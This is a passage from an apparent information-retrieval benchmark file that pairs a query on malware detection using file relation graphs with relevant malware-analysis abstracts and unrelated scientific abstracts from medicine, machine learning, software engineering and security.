"text": "BACKGROUND\nCurrent guidelines suggest that, for patients at moderate risk of death from unstable coronary-artery disease, either an interventional strategy (angiography followed by revascularisation) or a conservative strategy (ischaemia-driven or symptom-driven angiography) is appropriate. We aimed to test the hypothesis that an interventional strategy is better than a conservative strategy in such patients.\n\n\nMETHODS\nWe did a randomised multicentre trial of 1810 patients with non-ST-elevation acute coronary syndromes (mean age 62 years, 38% women). Patients were assigned an early intervention or conservative strategy. The antithrombin agent in both groups was enoxaparin. The co-primary endpoints were a combined rate of death, non-fatal myocardial infarction, or refractory angina at 4 months; and a combined rate of death or non-fatal myocardial infarction at 1 year. Analysis was by intention to treat.\n\n\nFINDINGS\nAt 4 months, 86 (9.6%) of 895 patients in the intervention group had died or had a myocardial infarction or refractory angina, compared with 133 (14.5%) of 915 patients in the conservative group (risk ratio 0.66, 95% CI 0.51-0.85, p=0.001). This difference was mainly due to a halving of refractory angina in the intervention group. Death or myocardial infarction was similar in both treatment groups at 1 year (68 [7.6%] vs 76 [8.3%], respectively; risk ratio 0.91, 95% CI 0.67-1.25, p=0.58). Symptoms of angina were improved and use of antianginal medications significantly reduced with the interventional strategy (p<0.0001).\n\n\nINTERPRETATION\nIn patients presenting with unstable coronary-artery disease, an interventional strategy is preferable to a conservative strategy, mainly because of the halving of refractory or severe angina, and with no increased risk of death or myocardial infarction.",
"title": ""
},
{
"docid": "ba6fe1b26d76d7ff3e84ddf3ca5d3e35",
"text": "The spacing effect describes the robust finding that long-term learning is promoted when learning events are spaced out in time rather than presented in immediate succession. Studies of the spacing effect have focused on memory processes rather than for other types of learning, such as the acquisition and generalization of new concepts. In this study, early elementary school children (5- to 7-year-olds; N = 36) were presented with science lessons on 1 of 3 schedules: massed, clumped, and spaced. The results revealed that spacing lessons out in time resulted in higher generalization performance for both simple and complex concepts. Spaced learning schedules promote several types of learning, strengthening the implications of the spacing effect for educational practices and curriculum.",
"title": ""
},
{
"docid": "c8d235d1fd40e972e9bc7078d6472776",
"text": "Performance of machine learning algorithms depends critically on identifying a good set of hyperparameters. While current methods offer efficiencies by adaptively choosing new configurations to train, an alternative strategy is to adaptively allocate resources across the selected configurations. We formulate hyperparameter optimization as a pure-exploration non-stochastic infinitely many armed bandit problem where allocation of additional resources to an arm corresponds to training a configuration on larger subsets of the data. We introduce HYPERBAND for this framework and analyze its theoretical properties, providing several desirable guarantees. We compare HYPERBAND with state-ofthe-art Bayesian optimization methods and a random search baseline on a comprehensive benchmark including 117 datasets. Our results on this benchmark demonstrate that while Bayesian optimization methods do not outperform random search trained for twice as long, HYPERBAND in favorable settings offers valuable speedups.",
"title": ""
},
{
"docid": "e2f83de1005e844e36a7c0cf241ec1f5",
"text": "Dermoscopy image is usually used in early diagnosis of malignant melanoma. The diagnosis accuracy by visual inspection is highly relied on the dermatologist's clinical experience. Due to the inaccuracy, subjectivity, and poor reproducibility of human judgement, an automatic recognition algorithm of dermoscopy image is highly desired. In this work, we present a hybrid classification framework for dermoscopy image assessment by combining deep convolutional neural network (CNN), Fisher vector (FV) and support vector machine (SVM). Specifically, the deep representations of subimages at various locations of a rescaled dermoscopy image are first extracted via a natural image dataset pre-trained on CNN. Then we adopt an orderless visual statistics based FV encoding methods to aggregate these features to build more invariant representations. Finally, the FV encoded representations are classified for diagnosis using a linear SVM. Compared with traditional low-level visual features based recognition approaches, our scheme is simpler and requires no complex preprocessing. Furthermore, the orderless representations are less sensitive to geometric deformation. We evaluate our proposed method on the ISBI 2016 Skin lesion challenge dataset and promising results are obtained. Also, we achieve consistent improvement in accuracy even without fine-tuning the CNN.",
"title": ""
},
{
"docid": "a836b7771937a15bc90d27de9fb8f9e4",
"text": "Principal component analysis (PCA) is a mainstay of modern data analysis a black box that is widely used but poorly understood. The goal of this paper is to dispel the magic behind this black box. This tutorial focuses on building a solid intuition for how and why principal component analysis works; furthermore, it crystallizes this knowledge by deriving from first principals, the mathematics behind PCA . This tutorial does not shy away from explaining the ideas informally, nor does it shy away from the mathematics. The hope is that by addressing both aspects, readers of all levels will be able to gain a better understanding of the power of PCA as well as the when, the how and the why of applying this technique.",
"title": ""
},
{
"docid": "b6983a5ccdac40607949e2bfe2beace2",
"text": "A focus on novel, confirmatory, and statistically significant results leads to substantial bias in the scientific literature. One type of bias, known as \"p-hacking,\" occurs when researchers collect or select data or statistical analyses until nonsignificant results become significant. Here, we use text-mining to demonstrate that p-hacking is widespread throughout science. We then illustrate how one can test for p-hacking when performing a meta-analysis and show that, while p-hacking is probably common, its effect seems to be weak relative to the real effect sizes being measured. This result suggests that p-hacking probably does not drastically alter scientific consensuses drawn from meta-analyses.",
"title": ""
},
{
"docid": "c9582409212e6f9b194175845216b2b6",
"text": "Although the amygdala complex is a brain area critical for human behavior, knowledge of its subspecialization is primarily derived from experiments in animals. We here employed methods for large-scale data mining to perform a connectivity-derived parcellation of the human amygdala based on whole-brain coactivation patterns computed for each seed voxel. Voxels within the histologically defined human amygdala were clustered into distinct groups based on their brain-wide coactivation maps. Using this approach, connectivity-based parcellation divided the amygdala into three distinct clusters that are highly consistent with earlier microstructural distinctions. Meta-analytic connectivity modelling then revealed the derived clusters' brain-wide connectivity patterns, while meta-data profiling allowed their functional characterization. These analyses revealed that the amygdala's laterobasal nuclei group was associated with coordinating high-level sensory input, whereas its centromedial nuclei group was linked to mediating attentional, vegetative, and motor responses. The often-neglected superficial nuclei group emerged as particularly sensitive to olfactory and probably social information processing. The results of this model-free approach support the concordance of structural, connectional, and functional organization in the human amygdala and point to the importance of acknowledging the heterogeneity of this region in neuroimaging research.",
"title": ""
},
{
"docid": "b81a28179d547f9f7b26a94da74166ea",
"text": "Contextual information plays an important role in solving vision problems such as image segmentation. However, extracting contextual information and using it in an effective way remains a difficult problem. To address this challenge, we propose a multi-resolution contextual framework, called cascaded hierarchical model (CHM), which learns contextual information in a hierarchical framework for image segmentation. At each level of the hierarchy, a classifier is trained based on down sampled input images and outputs of previous levels. Our model then incorporates the resulting multi-resolution contextual information into a classifier to segment the input image at original resolution. We repeat this procedure by cascading the hierarchical framework to improve the segmentation accuracy. Multiple classifiers are learned in the CHM, therefore, a fast and accurate classifier is required to make the training tractable. The classifier also needs to be robust against over fitting due to the large number of parameters learned during training. We introduce a novel classification scheme, called logistic disjunctive normal networks (LDNN), which consists of one adaptive layer of feature detectors implemented by logistic sigmoid functions followed by two fixed layers of logical units that compute conjunctions and disjunctions, respectively. We demonstrate that LDNN outperforms state-of-the-art classifiers and can be used in the CHM to improve object segmentation performance.",
"title": ""
},
{
"docid": "a6e062620666a4f6e88373d746d4418c",
"text": "A method for fabricating planar implantable microelectrode arrays was demonstrated using a process that relied on ultra-thin silicon substrates, which ranged in thickness from 25 to 50 μm. The challenge of handling these fragile materials was met via a temporary substrate support mechanism. In order to compensate for putative electrical shielding of extracellular neuronal fields, separately addressable electrode arrays were defined on each side of the silicon device. Deep reactive ion etching was employed to create sharp implantable shafts with lengths of up to 5 mm. The devices were flip-chip bonded onto printed circuit boards (PCBs) by means of an anisotropic conductive adhesive film. This scalable assembly technique enabled three-dimensional (3D) integration through formation of stacks of multiple silicon and PCB layers. Simulations and measurements of microelectrode noise appear to suggest that low impedance surfaces, which could be formed by electrodeposition of gold or other materials, are required to ensure an optimal signal-to-noise ratio as well a low level of interchannel crosstalk. (Some figures in this article are in colour only in the electronic version)",
"title": ""
},
{
"docid": "ff83e090897ed7b79537392801078ffb",
"text": "Component-based software engineering has had great impact in the desktop and server domain and is spreading to other domains as well, such as embedded systems. Agile software development is another approach which has gained much attention in recent years, mainly for smaller-scale production of less critical systems. Both of them promise to increase system quality, development speed and flexibility, but so far little has been published on the combination of the two approaches. This paper presents a comprehensive analysis of the applicability of the agile approach in the development processes of 1) COTS components and 2) COTS-based systems. The study method is a systematic theoretical examination and comparison of the fundamental concepts and characteristics of these approaches. The contributions are: first, an enumeration of identified contradictions between the approaches, and suggestions how to bridge these incompatibilities to some extent. Second, the paper provides some more general comments, considerations, and application guidelines concerning the introduction of agile principles into the development of COTS components or COTS-based systems. This study thus forms a framework which will guide further empirical studies.",
"title": ""
},
{
"docid": "6ed1985653d20180383948515edaf9a8",
"text": "The paradigm of ubiquitous computing has the potential to enhance classroom behavior management. In this work, we used an action research approach to examine the use of a tablet-based behavioral data collection system by school practitioners, and co-design an interface for displaying the behavioral data to their students. We present a wall-mounted display prototype and discuss its potential for supplementing existing classroom behavior management practices. We found that wall-mounted displays could help school practitioners to provide a wider range of behavioral reinforces and deliver specific and immediate feedback to students.",
"title": ""
},
{
"docid": "58da9f4a32fe0ea42d12718ff825b9b2",
"text": "Electroencephalography (EEG) is one fundamental tool for functional brain imaging. EEG signals tend to be represented by a vector or a matrix to facilitate data processing and analysis with generally understood methodologies like time-series analysis, spectral analysis and matrix decomposition. Indeed, EEG signals are often naturally born with more than two modes of time and space, and they can be denoted by a multi-way array called as tensor. This review summarizes the current progress of tensor decomposition of EEG signals with three aspects. The first is about the existing modes and tensors of EEG signals. Second, two fundamental tensor decomposition models, canonical polyadic decomposition (CPD, it is also called parallel factor analysis-PARAFAC) and Tucker decomposition, are introduced and compared. Moreover, the applications of the two models for EEG signals are addressed. Particularly, the determination of the number of components for each mode is discussed. Finally, the N-way partial least square and higher-order partial least square are described for a potential trend to process and analyze brain signals of two modalities simultaneously.",
"title": ""
},
{
"docid": "b1b57467dff40b52822ff2406405b217",
"text": "Placement of attributes/methods within classes in an object-oriented system is usually guided by conceptual criteria and aided by appropriate metrics. Moving state and behavior between classes can help reduce coupling and increase cohesion, but it is nontrivial to identify where such refactorings should be applied. In this paper, we propose a methodology for the identification of Move Method refactoring opportunities that constitute a way for solving many common feature envy bad smells. An algorithm that employs the notion of distance between system entities (attributes/methods) and classes extracts a list of behavior-preserving refactorings based on the examination of a set of preconditions. In practice, a software system may exhibit such problems in many different places. Therefore, our approach measures the effect of all refactoring suggestions based on a novel entity placement metric that quantifies how well entities have been placed in system classes. The proposed methodology can be regarded as a semi-automatic approach since the designer will eventually decide whether a suggested refactoring should be applied or not based on conceptual or other design quality criteria. The evaluation of the proposed approach has been performed considering qualitative, metric, conceptual, and efficiency aspects of the suggested refactorings in a number of open-source projects.",
"title": ""
}
] | scidocsrr |
426318eb3111163c7c6ef00b01aea650 | Intelligent malware detection based on file relation graphs | [
{
"docid": "b37de4587fbadad9258c1c063b03a07a",
"text": "Numerous attacks, such as worms, phishing, and botnets, threaten the availability of the Internet, the integrity of its hosts, and the privacy of its users. A core element of defense against these attacks is anti-virus(AV)–a service that detects, removes, and characterizes these threats. The ability of these products to successfully characterize these threats has far-reaching effects—from facilitating sharing across organizations, to detecting the emergence of new threats, and assessing risk in quarantine and cleanup. In this paper, we examine the ability of existing host-based anti-virus products to provide semantically meaningful information about the malicious software and tools (or malware) used by attackers. Using a large, recent collection of malware that spans a variety of attack vectors (e.g., spyware, worms, spam), we show that different AV products characterize malware in ways that are inconsistent across AV products, incomplete across malware, and that fail to be concise in their semantics. To address these limitations, we propose a new classification technique that describes malware behavior in terms of system state changes (e.g., files written, processes created) rather than in sequences or patterns of system calls. To address the sheer volume of malware and diversity of its behavior, we provide a method for automatically categorizing these profiles of malware into groups that reflect similar classes of behaviors and demonstrate how behavior-based clustering provides a more direct and effective way of classifying and analyzing Internet malware.",
"title": ""
},
{
"docid": "1c5f38009bb14d016ad8c44eed462184",
"text": "Data stream classification for intrusion detection poses at least three major challenges. First, these data streams are typically infinite-length, making traditional multipass learning algorithms inapplicable. Second, they exhibit significant concept-drift as attackers react and adapt to defenses. Third, for data streams that do not have any fixed feature set, such as text streams, an additional feature extraction and selection task must be performed. If the number of candidate features is too large, then traditional feature extraction techniques fail.\n In order to address the first two challenges, this article proposes a multipartition, multichunk ensemble classifier in which a collection of v classifiers is trained from r consecutive data chunks using v-fold partitioning of the data, yielding an ensemble of such classifiers. This multipartition, multichunk ensemble technique significantly reduces classification error compared to existing single-partition, single-chunk ensemble approaches, wherein a single data chunk is used to train each classifier. To address the third challenge, a feature extraction and selection technique is proposed for data streams that do not have any fixed feature set. The technique's scalability is demonstrated through an implementation for the Hadoop MapReduce cloud computing architecture. Both theoretical and empirical evidence demonstrate its effectiveness over other state-of-the-art stream classification techniques on synthetic data, real botnet traffic, and malicious executables.",
"title": ""
},
{
"docid": "c76d8ac34709f84215e365e2412b9f4e",
"text": "Anti-virus vendors are confronted with a multitude of potentially malicious samples today. Receiving thousands of new samples every day is not uncommon. The signatures that detect confirmed malicious threats are mainly still created manually, so it is important to discriminate between samples that pose a new unknown threat and those that are mere variants of known malware.\n This survey article provides an overview of techniques based on dynamic analysis that are used to analyze potentially malicious samples. It also covers analysis programs that leverage these It also covers analysis programs that employ these techniques to assist human analysts in assessing, in a timely and appropriate manner, whether a given sample deserves closer manual inspection due to its unknown malicious behavior.",
"title": ""
},
{
"docid": "2ba02f5d4339d993bda22f51c965fa2e",
"text": "In this paper, resting on the analysis of instruction frequency and function-based instruction sequences, we develop an Automatic Malware Categorization System (AMCS) for automatically grouping malware samples into families that share some common characteristics using a cluster ensemble by aggregating the clustering solutions generated by different base clustering algorithms. We propose a principled cluster ensemble framework for combining individual clustering solutions based on the consensus partition. The domain knowledge in the form of sample-level constraints can be naturally incorporated in the ensemble framework. In addition, to account for the characteristics of feature representations, we propose a hybrid hierarchical clustering algorithm which combines the merits of hierarchical clustering and k-medoids algorithms and a weighted subspace K-medoids algorithm to generate base clusterings. The categorization results of our AMCS system can be used to generate signatures for malware families that are useful for malware detection. The case studies on large and real daily malware collection from Kingsoft Anti-Virus Lab demonstrate the effectiveness and efficiency of our AMCS system.",
"title": ""
}
] | [
{
"docid": "5857805620b43cafa7a18461dfb74363",
"text": "In this paper, we give an overview for the shared task at the 5th CCF Conference on Natural Language Processing & Chinese Computing (NLPCC 2016): Chinese word segmentation for micro-blog texts. Different with the popular used newswire datasets, the dataset of this shared task consists of the relatively informal micro-texts. Besides, we also use a new psychometric-inspired evaluation metric for Chinese word segmentation, which addresses to balance the very skewed word distribution at different levels of difficulty. The data and evaluation codes can be downloaded from https://github.com/FudanNLP/ NLPCC-WordSeg-Weibo.",
"title": ""
},
{
"docid": "89bec90bd6715a3907fba9f0f7655158",
"text": "Long text brings a big challenge to neural network based text matching approaches due to their complicated structures. To tackle the challenge, we propose a knowledge enhanced hybrid neural network (KEHNN) that leverages prior knowledge to identify useful information and filter out noise in long text and performs matching from multiple perspectives. The model fuses prior knowledge into word representations by knowledge gates and establishes three matching channels with words, sequential structures of text given by Gated Recurrent Units (GRUs), and knowledge enhanced representations. The three channels are processed by a convolutional neural network to generate high level features for matching, and the features are synthesized as a matching score by a multilayer perceptron. In this paper, we focus on exploring the use of taxonomy knowledge for text matching. Evaluation results from extensive experiments on public data sets of question answering and conversation show that KEHNN can significantly outperform state-of-the-art matching models and particularly improve matching accuracy on pairs with long text.",
"title": ""
},
{
"docid": "9b57784b60ce53e323432cee5efbf321",
"text": "PURPOSE\nOver the last 10-15 years, there has been a substantive increase in compassion-based interventions aiming to improve psychological functioning and well-being.\n\n\nMETHODS\nThis study provides an overview and synthesis of the currently available compassion-based interventions. What do these programmes looks like, what are their aims, and what is the state of evidence underpinning each of them?\n\n\nRESULTS\nThis overview has found at least eight different compassion-based interventions (e.g., Compassion-Focused Therapy, Mindful Self-Compassion, Cultivating Compassion Training, Cognitively Based Compassion Training), with six having been evaluated in randomized controlled trials, and with a recent meta-analysis finding that compassion-based interventions produce moderate effect sizes for suffering and improved life satisfaction.\n\n\nCONCLUSIONS\nAlthough further research is warranted, the current state of evidence highlights the potential benefits of compassion-based interventions on a range of outcomes that clinicians can use in clinical practice with clients.\n\n\nPRACTITIONER POINTS\nThere are eight established compassion intervention programmes with six having RCT evidence. The most evaluated intervention to date is compassion-focused therapy. Further RCTs are needed in clinical populations for all compassion interventions. Ten recommendations are provided to improve the evidence-base of compassion interventions.",
"title": ""
},
{
"docid": "46adb7a040a2d8a40910a9f03825588d",
"text": "The aim of this study was to investigate the consequences of friend networking sites (e.g., Friendster, MySpace) for adolescents' self-esteem and well-being. We conducted a survey among 881 adolescents (10-19-year-olds) who had an online profile on a Dutch friend networking site. Using structural equation modeling, we found that the frequency with which adolescents used the site had an indirect effect on their social self-esteem and well-being. The use of the friend networking site stimulated the number of relationships formed on the site, the frequency with which adolescents received feedback on their profiles, and the tone (i.e., positive vs. negative) of this feedback. Positive feedback on the profiles enhanced adolescents' social self-esteem and well-being, whereas negative feedback decreased their self-esteem and well-being.",
"title": ""
},
{
"docid": "8e2e941c568328743c3fc56fda06b000",
"text": "Neuroscientific research has consistently found that the perception of an affective state in another activates the observer's own neural substrates for the corresponding state, which is likely the neural mechanism for \"true empathy.\" However, to date there has not been a brain-imaging investigation of so-called \"cognitive empathy\", whereby one \"actively projects oneself into the shoes of another person,\" imagining someone's personal, emotional experience as if it were one's own. In order to investigate this process, we conducted a combined psychophysiology and PET and study in which participants imagined: (1) a personal experience of fear or anger from their own past; (2) an equivalent experience from another person as if it were happening to them; and (3) a nonemotional experience from their own past. When participants could relate to the scenario of the other, they produced patterns of psychophysiological and neuroimaging activation equivalent to those of personal emotional imagery, but when they could not relate to the other's story, differences emerged on all measures, e.g., decreased psychophysiological responses and recruitment of a region between the inferior temporal and fusiform gyri. The substrates of cognitive empathy overlap with those of personal feeling states to the extent that one can relate to the state and situation of the other.",
"title": ""
},
{
"docid": "2e6f7dbf2e8c22e10e210bb7d7dff503",
"text": "In this paper, we present a detailed review on various types of SQL injection attacks, vulnerabilities, and prevention techniques. Alongside presenting our findings from the survey, we also note down future expectations and possible development of countermeasures against SQL injection attacks.",
"title": ""
},
{
"docid": "23ee528e0efe7c4fec7f8cda7e49a8dd",
"text": "The development of reliability-based design criteria for surface ship structures needs to consider the following three components: (1) loads, (2) structural strength, and (3) methods of reliability analysis. A methodology for reliability-based design of ship structures is provided in this document. The methodology consists of the following two approaches: (1) direct reliabilitybased design, and (2) load and resistance factor design (LRFD) rules. According to this methodology, loads can be linearly or nonlinearly treated. Also in assessing structural strength, linear or nonlinear analysis can be used. The reliability assessment and reliability-based design can be performed at several levels of a structural system, such as at the hull-girder, grillage, panel, plate and detail levels. A rational treatment of uncertainty is suggested by considering all its types. Also, failure definitions can have significant effects on the assessed reliability, or resulting reliability-based designs. A method for defining and classifying failures at the system level is provided. The method considers the continuous nature of redundancy in ship structures. A bibliography is provided at the end of this document to facilitate future implementation of the methodology.",
"title": ""
},
{
"docid": "12fe1e2edd640b55a769e5c881822aa6",
"text": "In this paper we introduce a runtime system to allow unmodified multi-threaded applications to use multiple machines. The system allows threads to migrate freely between machines depending on the workload. Our prototype, COMET (Code Offload by Migrating Execution Transparently), is a realization of this design built on top of the Dalvik Virtual Machine. COMET leverages the underlying memory model of our runtime to implement distributed shared memory (DSM) with as few interactions between machines as possible. Making use of a new VM-synchronization primitive, COMET imposes little restriction on when migration can occur. Additionally, enough information is maintained so one machine may resume computation after a network failure. We target our efforts towards augmenting smartphones or tablets with machines available in the network. We demonstrate the effectiveness of COMET on several real applications available on Google Play. These applications include image editors, turn-based games, a trip planner, and math tools. Utilizing a server-class machine, COMET can offer significant speed-ups on these real applications when run on a modern smartphone. With WiFi and 3G networks, we observe geometric mean speed-ups of 2.88X and 1.27X relative to the Dalvik interpreter across the set of applications with speed-ups as high as 15X on some applications.",
"title": ""
},
{
"docid": "a8ab6e98631639c0779271d5b57aae87",
"text": "Neonates are at high risk of meningitis and of resulting neurologic complications. Early recognition of neonates at risk of poor prognosis would be helpful in providing timely management. From January 2008 to June 2014, we enrolled 232 term neonates with bacterial meningitis admitted to 3 neonatology departments in Shanghai, China. The clinical status on the day of discharge from these hospitals or at a postnatal age of 2.5 to 3 months was evaluated using the Glasgow Outcome Scale (GOS). Patients were classified into two outcome groups: good (167 cases, 72.0%, GOS = 5) or poor (65 cases, 28.0%, GOS = 1-4). Neonates with good outcome had less frequent apnea, drowsiness, poor feeding, bulging fontanelle, irritability and more severe jaundice compared to neonates with poor outcome. The good outcome group also had less pneumonia than the poor outcome group. Besides, there were statistically significant differences in hemoglobin, mean platelet volume, platelet distribution width, C-reaction protein, procalcitonin, cerebrospinal fluid (CSF) glucose and CSF protein. Multivariate logistic regression analyses suggested that poor feeding, pneumonia and CSF protein were the predictors of poor outcome. CSF protein content was significantly higher in patients with poor outcome. The best cut-offs for predicting poor outcome were 1,880 mg/L in CSF protein concentration (sensitivity 70.8%, specificity 86.2%). After 2 weeks of treatment, CSF protein remained higher in the poor outcome group. High CSF protein concentration may prognosticate poor outcome in neonates with bacterial meningitis.",
"title": ""
},
{
"docid": "8bf5f5e332159674389d2026514fbc15",
"text": "This project examines the nature of password cracking and modern applications. Several applications for different platforms are studied. Different methods of cracking are explained, including dictionary attack, brute force, and rainbow tables. Password cracking across different mediums is examined. Hashing and how it affects password cracking is discussed. An implementation of two hash-based password cracking algorithms is developed, along with experimental results of their efficiency.",
"title": ""
},
{
"docid": "61575f2a6f02a652aa050ed4b8a72385",
"text": "To determine the accuracy of a pregnancy-associated glycoprotein (PAG) ELISA in identifying pregnancy status 27 d after timed artificial insemination (TAI), blood samples were collected from lactating Holstein cows (n = 1,079) 27 d after their first, second, and third postpartum TAI services. Pregnancy diagnosis by transrectal ultrasonography (TU) was performed immediately after blood sample collection, and pregnancy outcomes by TU served as a standard to test the accuracy of the PAG ELISA. Pregnancy outcomes based on the PAG ELISA and TU that agreed were considered correct, whereas the pregnancy status of cows in which pregnancy outcomes between PAG and TU disagreed were reassessed by TU 5 d later. The accuracy of pregnancy diagnosis was less than expected when using TU 27 d after TAI (93.7 to 97.8%), especially when pregnancy outcomes were based on visualization of chorioallantoic fluid and a corpus luteum but when an embryo was not visualized. The accuracy of PAG ELISA outcomes 27 d after TAI was 93.7, 95.4, and 96.2% for first, second, and third postpartum TAI services, respectively. Statistical agreement (kappa) between TU and the PAG ELISA 27 d after TAI was 0.87 to 0.90. Pregnancy outcomes based on the PAG ELISA had a high negative predictive value, indicating that the probability of incorrectly administering PGF(2alpha) to pregnant cows would be low if this test were implemented on a commercial dairy.",
"title": ""
},
{
"docid": "52f95d1c0e198c64455269fd09108703",
"text": "Dynamic control theory has long been used in solving optimal asset allocation problems, and a number of trading decision systems based on reinforcement learning methods have been applied in asset allocation and portfolio rebalancing. In this paper, we extend the existing work in recurrent reinforcement learning (RRL) and build an optimal variable weight portfolio allocation under a coherent downside risk measure, the expected maximum drawdown, E(MDD). In particular, we propose a recurrent reinforcement learning method, with a coherent risk adjusted performance objective function, the Calmar ratio, to obtain both buy and sell signals and asset allocation weights. Using a portfolio consisting of the most frequently traded exchange-traded funds, we show that the expected maximum drawdown risk based objective function yields superior return performance compared to previously proposed RRL objective functions (i.e. the Sharpe ratio and the Sterling ratio), and that variable weight RRL long/short portfolios outperform equal weight RRL long/short portfolios under different transaction cost scenarios. We further propose an adaptive E(MDD) risk based RRL portfolio rebalancing decision system with a transaction cost and market condition stop-loss retraining mechanism, and we show that the ∗Corresponding author: Steve Y. Yang, Postal address: School of Business, Stevens Institute of Technology, 1 Castle Point on Hudson, Hoboken, NJ 07030 USA. Tel.: +1 201 216 3394 Fax: +1 201 216 5385 Email addresses: salmahdi@stevens.edu (Saud Almahdi), steve.yang@stevens.edu (Steve Y. Yang) Preprint submitted to Expert Systems with Applications June 15, 2017",
"title": ""
},
{
"docid": "049a7164a973fb515ed033ba216ec344",
"text": "Modern vehicle fleets, e.g., for ridesharing platforms and taxi companies, can reduce passengers' waiting times by proactively dispatching vehicles to locations where pickup requests are anticipated in the future. Yet it is unclear how to best do this: optimal dispatching requires optimizing over several sources of uncertainty, including vehicles' travel times to their dispatched locations, as well as coordinating between vehicles so that they do not attempt to pick up the same passenger. While prior works have developed models for this uncertainty and used them to optimize dispatch policies, in this work we introduce a model-free approach. Specifically, we propose MOVI, a Deep Q-network (DQN)-based framework that directly learns the optimal vehicle dispatch policy. Since DQNs scale poorly with a large number of possible dispatches, we streamline our DQN training and suppose that each individual vehicle independently learns its own optimal policy, ensuring scalability at the cost of less coordination between vehicles. We then formulate a centralized receding-horizon control (RHC) policy to compare with our DQN policies. To compare these policies, we design and build MOVI as a large-scale realistic simulator based on 15 million taxi trip records that simulates policy-agnostic responses to dispatch decisions. We show that the DQN dispatch policy reduces the number of unserviced requests by 76% compared to without dispatch and 20% compared to the RHC approach, emphasizing the benefits of a model-free approach and suggesting that there is limited value to coordinating vehicle actions. This finding may help to explain the success of ridesharing platforms, for which drivers make individual decisions.",
"title": ""
},
{
"docid": "9c510d7ddeb964c5d762d63d9e284f44",
"text": "This paper explains the rationale for the development of reconfigurable manufacturing systems, which possess the advantages both of dedicated lines and of flexible systems. The paper defines the core characteristics and design principles of reconfigurable manufacturing systems (RMS) and describes the structure recommended for practical RMS with RMS core characteristics. After that, a rigorous mathematical method is introduced for designing RMS with this recommended structure. An example is provided to demonstrate how this RMS design method is used. The paper concludes with a discussion of reconfigurable assembly systems. © 2011 The Society of Manufacturing Engineers. Published by Elsevier Ltd. All rights reserved.",
"title": ""
},
{
"docid": "c25a03119f18655aae434424d99fe986",
"text": "In this paper we introduce, analyze and quantitatively compare a number of surface simplification methods for point-sampled geometry. We have implemented incremental and hierarchical clustering, iterative simplification, and particle simulation algorithms to create approximations of point-based models with lower sampling density. All these methods work directly on the point cloud, requiring no intermediate tesselation. We show how local variation estimation and quadric error metrics can be employed to diminish the approximation error and concentrate more samples in regions of high curvature. To compare the quality of the simplified surfaces, we have designed a new method for computing numerical and visual error estimates for point-sampled surfaces. Our algorithms are fast, easy to implement, and create high-quality surface approximations, clearly demonstrating the effectiveness of point-based surface simplification.",
"title": ""
},
{
"docid": "49cab61f0bb863e759585da23c9bb96c",
"text": "An UHD AMOLED display driver IC, enabling real-time TFT non-uniformity compensation, is presented with a hybrid driving scheme. The proposed hybrid driving scheme drives a mobile UHD (3840×1920) AMOLED panel, whose scan time is 7.7μs at a scan frequency of 60Hz, through the load of 30kohm resistance and 30pF capacitance. A proposed accurate current sensor embedded in the column driver and a back-end compensation scheme reduce maximum current error between emulated TFTs within 0.94 LSB (37nA) of 8-bit gray scales. Since the TFT variation is externally compensated, a simple 3T1C pixel circuit is employed in each pixel.",
"title": ""
},
{
"docid": "fe2870a3f36b9a042ec9cece5a64dafd",
"text": "This paper provides a methodology to study the PHY layer vulnerability of wireless protocols in hostile radio environments. Our approach is based on testing the vulnerabilities of a system by analyzing the individual subsystems. By targeting an individual subsystem or a combination of subsystems at a time, we can infer the weakest part and revise it to improve the overall system performance. We apply our methodology to 4G LTE downlink by considering each control channel as a subsystem. We also develop open-source software enabling research and education using software-defined radios. We present experimental results with open-source LTE systems and shows how the different subsystems behave under targeted interference. The analysis for the LTE downlink shows that the synchronization signals (PSS/SSS) are very resilient to interference, whereas the downlink pilots or Cell-Specific Reference signals (CRS) are the most susceptible to a synchronized protocol-aware interferer. We also analyze the severity of control channel attacks for different LTE configurations. Our methodology and tools allow rapid evaluation of the PHY layer reliability in harsh signaling environments, which is an asset to improve current standards and develop new and robust wireless protocols.",
"title": ""
},
{
"docid": "48b1fdb9343aee6582f11013d63667de",
"text": "Most of the state of the art works and researches on the automatic sentiment analysis and opinion mining of texts collected from social networks and microblogging websites are oriented towards the classification of texts into positive and negative. In this paper, we propose a pattern-based approach that goes deeper in the classification of texts collected from Twitter (i.e., tweets). We classify the tweets into 7 different classes; however the approach can be run to classify into more classes. Experiments show that our approach reaches an accuracy of classification equal to 56.9% and a precision level of sentimental tweets (other than neutral and sarcastic) equal to 72.58%. Nevertheless, the approach proves to be very accurate in binary classification (i.e., classification into “positive” and “negative”) and ternary classification (i.e., classification into “positive”, “negative” and “neutral”): in the former case, we reach an accuracy of 87.5% for the same dataset used after removing neutral tweets, and in the latter case, we reached an accuracy of classification of 83.0%.",
"title": ""
},
{
"docid": "b44de9b14b6084a88139a3bbf52f337b",
"text": "Standard user applications provide a range of cross-cutting interaction techniques that are common to virtually all such tools: selection, filtering, navigation, layer management, and cut-and-paste. We present VisDock, a JavaScript mixin library that provides a core set of these cross-cutting interaction techniques for visualization, including selection (lasso, paths, shape selection, etc), layer management (visibility, transparency, set operations, etc), navigation (pan, zoom, overview, magnifying lenses, etc), and annotation (point-based, region-based, data-space based, etc). To showcase the utility of the library, we have released it as Open Source and integrated it with a large number of existing web-based visualizations. Furthermore, we have evaluated VisDock using qualitative studies with both developers utilizing the toolkit to build new web-based visualizations, as well as with end-users utilizing it to explore movie ratings data. Results from these studies highlight the usability and effectiveness of the toolkit from both developer and end-user perspectives.",
"title": ""
},
{
"docid": "5ea65120d42f75d594d73e92cc82dc48",
"text": "There is a new generation of emoticons, called emojis, that is increasingly being used in mobile communications and social media. In the past two years, over ten billion emojis were used on Twitter. Emojis are Unicode graphic symbols, used as a shorthand to express concepts and ideas. In contrast to the small number of well-known emoticons that carry clear emotional contents, there are hundreds of emojis. But what are their emotional contents? We provide the first emoji sentiment lexicon, called the Emoji Sentiment Ranking, and draw a sentiment map of the 751 most frequently used emojis. The sentiment of the emojis is computed from the sentiment of the tweets in which they occur. We engaged 83 human annotators to label over 1.6 million tweets in 13 European languages by the sentiment polarity (negative, neutral, or positive). About 4% of the annotated tweets contain emojis. The sentiment analysis of the emojis allows us to draw several interesting conclusions. It turns out that most of the emojis are positive, especially the most popular ones. The sentiment distribution of the tweets with and without emojis is significantly different. The inter-annotator agreement on the tweets with emojis is higher. Emojis tend to occur at the end of the tweets, and their sentiment polarity increases with the distance. We observe no significant differences in the emoji rankings between the 13 languages and the Emoji Sentiment Ranking. Consequently, we propose our Emoji Sentiment Ranking as a European language-independent resource for automated sentiment analysis. Finally, the paper provides a formalization of sentiment and a novel visualization in the form of a sentiment bar.",
"title": ""
}
] | scidocsrr |
